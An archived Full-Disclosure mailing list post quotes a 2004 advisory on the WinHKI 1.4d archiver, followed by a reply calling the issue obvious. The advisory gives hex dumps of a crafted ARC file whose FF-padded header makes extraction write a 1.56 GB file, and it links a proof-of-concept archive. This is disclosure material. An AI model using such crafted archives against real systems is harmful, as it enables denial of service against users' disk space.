lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Message-ID: <20050108092930.73686.qmail@web20222.mail.yahoo.com>
From: visitbipin at yahoo.com (bipin gautam)
Subject: WinHKI - ARC File Extraction of 1KB to 1.56GB

that's obvious isn't it... say... if you create a few
GB file with null characters, 0X00 and compress
it...... that will produce a similar result. such
issue is known for any file compress utility for ages.


any... software will do the same! try it. and THAT'S
OBVIOUS!
--- "Rafel Ivgi, The-Insider" <theinsider@....net.il>
wrote:

>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> Application:    WinHKI
> Vendors:        http://www.webtoolmaster.com
> Versions:       1.4d
> Platforms:      Windows
> Bug:            ARC File Extraction of 1KB to 1.56GB
> Exploitation:   Local (extract file)
> Date:           24 Dec 2004
> Author:         Rafel Ivgi, The-Insider
> E-Mail:         the_insider@...l.com
> Website:        http://theinsider.deep-ice.com
> 
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> 1) Introduction
> 2) Bugs
> 3) The Code
> 
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> ===============
> 1) Introduction
> ===============
> 
> WinHKI is a file archiever which supports: ARC, BH,
> CAB, HKI, JAR, LHA,TAR,
> 
> GZ compressions.
> 
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> ======
> 2) Bug
> ======
> 
> This is a normal CAB compressed file header
> 
> 00000000 1A02 3235 312E 4854 4D00 5E5E 5E5E 5E1B
> ..251.HTM.^^^^^.
> 00000010 0000 0078 3139 73B5 121B 0000 003C 7363
> ...x19s......<sc
> 00000020 7269 7074 FB3E 616C 6572 7428 293C 2F73
> ript.>alert()</s
> 00000030 6372 6970 743E 0D0A 1A00               
> cript>....
> 
> By adding after the filename header a certain amount
> of chars
> and replacing all nulls (00) with FF (in order to
> avoid our
> long string from being terminated)
> 
> 00000000 1A02 3235 312E 4854 4DFF 5E5E 5E5E 5EFF
> ..251.HTM.^^^^^.
> 00000010 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000020 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000030 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000040 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000050 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000060 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000070 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000080 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000090 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000000A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000000B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000000C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000000D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000000E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000000F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000100 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000110 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000120 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000130 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000140 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000150 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000160 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000170 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000180 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000190 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000001A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000001B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000001C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000001D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000001E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000001F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000200 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000210 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000220 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000230 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000240 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000250 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000260 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000270 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000280 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000290 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000002A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000002B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000002C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000002D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000002E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000002F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000300 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000310 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000320 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000330 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000340 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000350 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000360 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000370 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000380 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000390 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000003A0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000003B0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000003C0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000003D0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000003E0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 000003F0 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FFFF
> ................
> 00000400 FFFF FFFF FFFF FFFF FFFF FFFF FFFF FF1B
> ................
> 00000410 FFFF FF78 3139 73B5 121B FFFF FF3C 7363
> ...x19s......<sc
> 00000420 7269 7074 FB3E 616C 6572 7428 293C 2F73
> ript.>alert()</s
> 00000430 6372 6970 743E 0D0A 1A00               
> cript>....
> 
> 
> HKI will create a 1.56 GIGA BYTE file on at the
> selected extract location.
> 
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> ===========
> 3) The Code
> ===========
> 
> An online proof of concept can be found at:
> http://theinsider.deep-ice.com/hki156gb.ARC
> 
>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> 
> ---
> Rafel Ivgi, The-Insider
> http://theinsider.deep-ice.com
> 
> "Scripts and Codes will make me D.O.S , but they
> will never HACK me."
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> http://lists.netsys.com/full-disclosure-charter.html
> 



		
__________________________________ 
Do you Yahoo!? 
Yahoo! Mail - Easier than ever with enhanced search. Learn more.
http://info.mail.yahoo.com/mail_250

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ